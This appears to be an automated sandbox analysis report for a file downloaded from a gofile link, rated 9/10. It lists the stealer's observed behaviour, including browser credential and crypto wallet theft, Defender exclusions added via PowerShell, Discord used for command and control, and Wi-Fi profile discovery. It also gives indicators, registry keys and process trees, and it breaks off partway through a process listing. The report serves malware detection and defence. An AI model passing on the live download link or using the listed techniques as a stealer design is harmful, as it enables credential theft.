hxxps://gofile[.]io/d/DTlW5V

Analysis

max time kernel
885s
max time network
920s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
14/09/2024, 23:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://gofile.io/d/DTlW5V

Score

9^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
6032	powershell.exe
6024	powershell.exe
6040	powershell.exe
6420	powershell.exe
2616	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	bound.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	wscript.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
5208	cmd.exe
6552	powershell.exe

Executes dropped EXE 6 IoCs

pid	Process
2980	Prankscript.exe
5128	Prankscript.exe
668	Prankscript.exe
5268	Prankscript.exe
6056	bound.exe
6224	rar.exe

Loads dropped DLL 31 IoCs

pid	Process
5128	Prankscript.exe
5128	Prankscript.exe
5128	Prankscript.exe
5268	Prankscript.exe
5128	Prankscript.exe
5268	Prankscript.exe
5268	Prankscript.exe
5268	Prankscript.exe
5128	Prankscript.exe
5128	Prankscript.exe
5128	Prankscript.exe
5128	Prankscript.exe
5128	Prankscript.exe
5128	Prankscript.exe
5128	Prankscript.exe
5128	Prankscript.exe
5128	Prankscript.exe
5128	Prankscript.exe
5128	Prankscript.exe
5268	Prankscript.exe
5128	Prankscript.exe
5268	Prankscript.exe
5268	Prankscript.exe
5268	Prankscript.exe
5268	Prankscript.exe
5268	Prankscript.exe
5268	Prankscript.exe
5268	Prankscript.exe
5268	Prankscript.exe
5268	Prankscript.exe
5268	Prankscript.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00070000000234c2-192.dat	upx
behavioral1/memory/5128-196-0x00007FFD46340000-0x00007FFD46A19000-memory.dmp	upx
behavioral1/files/0x00070000000234b4-223.dat	upx
behavioral1/files/0x00070000000234c0-229.dat	upx
behavioral1/memory/5128-228-0x00007FFD57E90000-0x00007FFD57EB5000-memory.dmp	upx
behavioral1/memory/5128-249-0x00007FFD582F0000-0x00007FFD582FF000-memory.dmp	upx
behavioral1/memory/5268-248-0x00007FFD45430000-0x00007FFD45B09000-memory.dmp	upx
behavioral1/memory/5268-261-0x00007FFD580C0000-0x00007FFD580CF000-memory.dmp	upx
behavioral1/files/0x00070000000234d8-259.dat	upx
behavioral1/files/0x00070000000234d6-258.dat	upx
behavioral1/memory/5268-254-0x00007FFD57850000-0x00007FFD57875000-memory.dmp	upx
behavioral1/files/0x00070000000234bb-247.dat	upx
behavioral1/files/0x00070000000234ba-246.dat	upx
behavioral1/files/0x00070000000234b9-245.dat	upx
behavioral1/files/0x00070000000234b8-244.dat	upx
behavioral1/files/0x00070000000234b7-243.dat	upx
behavioral1/files/0x00070000000234b6-242.dat	upx
behavioral1/files/0x00070000000234b5-241.dat	upx
behavioral1/files/0x00080000000234b3-240.dat	upx
behavioral1/files/0x00070000000234c7-239.dat	upx
behavioral1/files/0x00070000000234c6-238.dat	upx
behavioral1/files/0x00070000000234c5-237.dat	upx
behavioral1/memory/5128-268-0x00007FFD563D0000-0x00007FFD563F4000-memory.dmp	upx
behavioral1/memory/5128-269-0x00007FFD452B0000-0x00007FFD45426000-memory.dmp	upx
behavioral1/memory/5128-267-0x00007FFD57550000-0x00007FFD57569000-memory.dmp	upx
behavioral1/memory/5128-266-0x00007FFD57820000-0x00007FFD5784D000-memory.dmp	upx
behavioral1/memory/5268-273-0x00007FFD45430000-0x00007FFD45B09000-memory.dmp	upx
behavioral1/memory/5128-274-0x00007FFD46340000-0x00007FFD46A19000-memory.dmp	upx
behavioral1/memory/5128-277-0x00007FFD57E90000-0x00007FFD57EB5000-memory.dmp	upx
behavioral1/memory/5128-288-0x00007FFD452B0000-0x00007FFD45426000-memory.dmp	upx
behavioral1/memory/5128-287-0x00007FFD44C60000-0x00007FFD44D7B000-memory.dmp	upx
behavioral1/memory/5268-292-0x00007FFD46F10000-0x00007FFD46F34000-memory.dmp	upx
behavioral1/memory/5268-291-0x00007FFD44AE0000-0x00007FFD44C56000-memory.dmp	upx
behavioral1/memory/5268-290-0x00007FFD47670000-0x00007FFD47689000-memory.dmp	upx
behavioral1/memory/5268-295-0x00007FFD46EB0000-0x00007FFD46EE3000-memory.dmp	upx
behavioral1/memory/5268-294-0x00007FFD57810000-0x00007FFD5781D000-memory.dmp	upx
behavioral1/memory/5268-293-0x00007FFD46EF0000-0x00007FFD46F09000-memory.dmp	upx
behavioral1/memory/5128-289-0x00007FFD563D0000-0x00007FFD563F4000-memory.dmp	upx
behavioral1/memory/5268-286-0x00007FFD47960000-0x00007FFD4798D000-memory.dmp	upx
behavioral1/memory/5268-285-0x00007FFD57850000-0x00007FFD57875000-memory.dmp	upx
behavioral1/memory/5128-283-0x00007FFD578F0000-0x00007FFD578FD000-memory.dmp	upx
behavioral1/memory/5128-282-0x00007FFD4F840000-0x00007FFD4F854000-memory.dmp	upx
behavioral1/memory/5128-298-0x00007FFD49E80000-0x00007FFD49EB3000-memory.dmp	upx
behavioral1/memory/5268-297-0x00007FFD444E0000-0x00007FFD445AD000-memory.dmp	upx
behavioral1/memory/5268-302-0x00007FFD574D0000-0x00007FFD574DD000-memory.dmp	upx
behavioral1/memory/5128-301-0x00007FFD46F40000-0x00007FFD4700D000-memory.dmp	upx
behavioral1/memory/5268-300-0x00007FFD46320000-0x00007FFD46334000-memory.dmp	upx
behavioral1/memory/5128-299-0x00007FFD44D80000-0x00007FFD452A9000-memory.dmp	upx
behavioral1/memory/5268-296-0x00007FFD445B0000-0x00007FFD44AD9000-memory.dmp	upx
behavioral1/memory/5128-276-0x00007FFD46F40000-0x00007FFD4700D000-memory.dmp	upx
behavioral1/memory/5128-275-0x00007FFD44D80000-0x00007FFD452A9000-memory.dmp	upx
behavioral1/memory/5128-272-0x00007FFD49E80000-0x00007FFD49EB3000-memory.dmp	upx
behavioral1/memory/5128-271-0x00007FFD57C50000-0x00007FFD57C5D000-memory.dmp	upx
behavioral1/memory/5128-270-0x00007FFD53560000-0x00007FFD53579000-memory.dmp	upx
behavioral1/memory/5268-435-0x00007FFD47960000-0x00007FFD4798D000-memory.dmp	upx
behavioral1/memory/5268-486-0x00007FFD44AE0000-0x00007FFD44C56000-memory.dmp	upx
behavioral1/memory/5268-489-0x00007FFD46EB0000-0x00007FFD46EE3000-memory.dmp	upx
behavioral1/memory/5268-488-0x00007FFD57810000-0x00007FFD5781D000-memory.dmp	upx
behavioral1/memory/5268-487-0x00007FFD46EF0000-0x00007FFD46F09000-memory.dmp	upx
behavioral1/memory/5268-491-0x00007FFD444E0000-0x00007FFD445AD000-memory.dmp	upx
behavioral1/memory/5268-484-0x00007FFD47670000-0x00007FFD47689000-memory.dmp	upx
behavioral1/memory/5268-496-0x00007FFD580C0000-0x00007FFD580CF000-memory.dmp	upx
behavioral1/memory/5268-497-0x00007FFD45430000-0x00007FFD45B09000-memory.dmp	upx
behavioral1/memory/5268-495-0x00007FFD57850000-0x00007FFD57875000-memory.dmp	upx

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
172	discord.com
173	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
74	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
6076	tasklist.exe
6048	tasklist.exe
6560	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
5588	cmd.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4428	cmd.exe
3956	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
5332	cmd.exe
6612	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1964	WMIC.exe

Enumerates system info in registry 2 TTPs 12 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
6600	systeminfo.exe

Kills process with taskkill 11 IoCs

evasion

pid	Process
6244	taskkill.exe
6248	taskkill.exe
5772	taskkill.exe
6208	taskkill.exe
5872	taskkill.exe
6348	taskkill.exe
6748	taskkill.exe
5784	taskkill.exe
6964	taskkill.exe
5920	taskkill.exe
5472	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-656926755-4116854191-210765258-1000\{6DD59E0E-39D8-46C0-8DC2-AFB7AC0391AB}	msedge.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 761172.crdownload:SmartScreen	msedge.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3956	PING.EXE

Suspicious behavior: EnumeratesProcesses 56 IoCs

pid	Process
2092	msedge.exe
2092	msedge.exe
3948	msedge.exe
3948	msedge.exe
2768	identity_helper.exe
2768	identity_helper.exe
2036	msedge.exe
2036	msedge.exe
6032	powershell.exe
6032	powershell.exe
6040	powershell.exe
6040	powershell.exe
6024	powershell.exe
6024	powershell.exe
6040	powershell.exe
6032	powershell.exe
6032	powershell.exe
6024	powershell.exe
6552	powershell.exe
6552	powershell.exe
6752	powershell.exe
6752	powershell.exe
6552	powershell.exe
6752	powershell.exe
6420	powershell.exe
6420	powershell.exe
6420	powershell.exe
5808	powershell.exe
5808	powershell.exe
5808	powershell.exe
2616	powershell.exe
2616	powershell.exe
2616	powershell.exe
3856	powershell.exe
3856	powershell.exe
3856	powershell.exe
6988	msedge.exe
6988	msedge.exe
2848	msedge.exe
2848	msedge.exe
6964	identity_helper.exe
6964	identity_helper.exe
5724	chrome.exe
5724	chrome.exe
7068	msedge.exe
7068	msedge.exe
5000	msedge.exe
5000	msedge.exe
6800	msedge.exe
6800	msedge.exe
4900	identity_helper.exe
4900	identity_helper.exe
2132	msedge.exe
2132	msedge.exe
2132	msedge.exe
2132	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 34 IoCs

pid	Process
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
5724	chrome.exe
5724	chrome.exe
5724	chrome.exe
5000	msedge.exe
5000	msedge.exe
5000	msedge.exe
5000	msedge.exe
5000	msedge.exe
5000	msedge.exe
5000	msedge.exe
5000	msedge.exe
5000	msedge.exe
5000	msedge.exe
5000	msedge.exe
5000	msedge.exe
5000	msedge.exe
5000	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	6076	tasklist.exe
Token: SeDebugPrivilege	6048	tasklist.exe
Token: SeDebugPrivilege	6032	powershell.exe
Token: SeDebugPrivilege	6040	powershell.exe
Token: SeDebugPrivilege	6024	powershell.exe
Token: SeIncreaseQuotaPrivilege	6400	WMIC.exe
Token: SeSecurityPrivilege	6400	WMIC.exe
Token: SeTakeOwnershipPrivilege	6400	WMIC.exe
Token: SeLoadDriverPrivilege	6400	WMIC.exe
Token: SeSystemProfilePrivilege	6400	WMIC.exe
Token: SeSystemtimePrivilege	6400	WMIC.exe
Token: SeProfSingleProcessPrivilege	6400	WMIC.exe
Token: SeIncBasePriorityPrivilege	6400	WMIC.exe
Token: SeCreatePagefilePrivilege	6400	WMIC.exe
Token: SeBackupPrivilege	6400	WMIC.exe
Token: SeRestorePrivilege	6400	WMIC.exe
Token: SeShutdownPrivilege	6400	WMIC.exe
Token: SeDebugPrivilege	6400	WMIC.exe
Token: SeSystemEnvironmentPrivilege	6400	WMIC.exe
Token: SeRemoteShutdownPrivilege	6400	WMIC.exe
Token: SeUndockPrivilege	6400	WMIC.exe
Token: SeManageVolumePrivilege	6400	WMIC.exe
Token: 33	6400	WMIC.exe
Token: 34	6400	WMIC.exe
Token: 35	6400	WMIC.exe
Token: 36	6400	WMIC.exe
Token: SeIncreaseQuotaPrivilege	6400	WMIC.exe
Token: SeSecurityPrivilege	6400	WMIC.exe
Token: SeTakeOwnershipPrivilege	6400	WMIC.exe
Token: SeLoadDriverPrivilege	6400	WMIC.exe
Token: SeSystemProfilePrivilege	6400	WMIC.exe
Token: SeSystemtimePrivilege	6400	WMIC.exe
Token: SeProfSingleProcessPrivilege	6400	WMIC.exe
Token: SeIncBasePriorityPrivilege	6400	WMIC.exe
Token: SeCreatePagefilePrivilege	6400	WMIC.exe
Token: SeBackupPrivilege	6400	WMIC.exe
Token: SeRestorePrivilege	6400	WMIC.exe
Token: SeShutdownPrivilege	6400	WMIC.exe
Token: SeDebugPrivilege	6400	WMIC.exe
Token: SeSystemEnvironmentPrivilege	6400	WMIC.exe
Token: SeRemoteShutdownPrivilege	6400	WMIC.exe
Token: SeUndockPrivilege	6400	WMIC.exe
Token: SeManageVolumePrivilege	6400	WMIC.exe
Token: 33	6400	WMIC.exe
Token: 34	6400	WMIC.exe
Token: 35	6400	WMIC.exe
Token: 36	6400	WMIC.exe
Token: SeDebugPrivilege	6560	tasklist.exe
Token: SeDebugPrivilege	6552	powershell.exe
Token: SeDebugPrivilege	6752	powershell.exe
Token: SeDebugPrivilege	6748	taskkill.exe
Token: SeDebugPrivilege	5784	taskkill.exe
Token: SeDebugPrivilege	6964	taskkill.exe
Token: SeDebugPrivilege	5920	taskkill.exe
Token: SeDebugPrivilege	5472	taskkill.exe
Token: SeDebugPrivilege	6248	taskkill.exe
Token: SeDebugPrivilege	5772	taskkill.exe
Token: SeDebugPrivilege	6208	taskkill.exe
Token: SeDebugPrivilege	5872	taskkill.exe
Token: SeDebugPrivilege	6348	taskkill.exe
Token: SeDebugPrivilege	6244	taskkill.exe
Token: SeDebugPrivilege	6420	powershell.exe
Token: SeDebugPrivilege	5808	powershell.exe
Token: SeIncreaseQuotaPrivilege	5232	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
3948	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
2848	msedge.exe
5724	chrome.exe
5724	chrome.exe
5724	chrome.exe
5724	chrome.exe
5724	chrome.exe
5724	chrome.exe
5724	chrome.exe
5724	chrome.exe
5724	chrome.exe
5724	chrome.exe
5724	chrome.exe
5724	chrome.exe
5724	chrome.exe
5724	chrome.exe
5724	chrome.exe
5724	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3948 wrote to memory of 1920	3948	msedge.exe	85
PID 3948 wrote to memory of 1920	3948	msedge.exe	85
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 4472	3948	msedge.exe	86
PID 3948 wrote to memory of 2092	3948	msedge.exe	87
PID 3948 wrote to memory of 2092	3948	msedge.exe	87
PID 3948 wrote to memory of 5116	3948	msedge.exe	88
PID 3948 wrote to memory of 5116	3948	msedge.exe	88
PID 3948 wrote to memory of 5116	3948	msedge.exe	88
PID 3948 wrote to memory of 5116	3948	msedge.exe	88
PID 3948 wrote to memory of 5116	3948	msedge.exe	88
PID 3948 wrote to memory of 5116	3948	msedge.exe	88
PID 3948 wrote to memory of 5116	3948	msedge.exe	88
PID 3948 wrote to memory of 5116	3948	msedge.exe	88
PID 3948 wrote to memory of 5116	3948	msedge.exe	88
PID 3948 wrote to memory of 5116	3948	msedge.exe	88
PID 3948 wrote to memory of 5116	3948	msedge.exe	88
PID 3948 wrote to memory of 5116	3948	msedge.exe	88
PID 3948 wrote to memory of 5116	3948	msedge.exe	88
PID 3948 wrote to memory of 5116	3948	msedge.exe	88
PID 3948 wrote to memory of 5116	3948	msedge.exe	88
PID 3948 wrote to memory of 5116	3948	msedge.exe	88
PID 3948 wrote to memory of 5116	3948	msedge.exe	88
PID 3948 wrote to memory of 5116	3948	msedge.exe	88
PID 3948 wrote to memory of 5116	3948	msedge.exe	88
PID 3948 wrote to memory of 5116	3948	msedge.exe	88

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
6064	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://gofile.io/d/DTlW5V
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd582646f8,0x7ffd58264708,0x7ffd58264718
  2⤵
  PID:1920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,11208209628168679594,4287911362634499194,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2316 /prefetch:2
  2⤵
  PID:4472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,11208209628168679594,4287911362634499194,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,11208209628168679594,4287911362634499194,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2764 /prefetch:8
  2⤵
  PID:5116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11208209628168679594,4287911362634499194,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
  2⤵
  PID:2568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11208209628168679594,4287911362634499194,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
  2⤵
  PID:1904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11208209628168679594,4287911362634499194,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4616 /prefetch:1
  2⤵
  PID:2040
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11208209628168679594,4287911362634499194,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5032 /prefetch:1
  2⤵
  PID:4596
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,11208209628168679594,4287911362634499194,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5440 /prefetch:8
  2⤵
  PID:3620
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
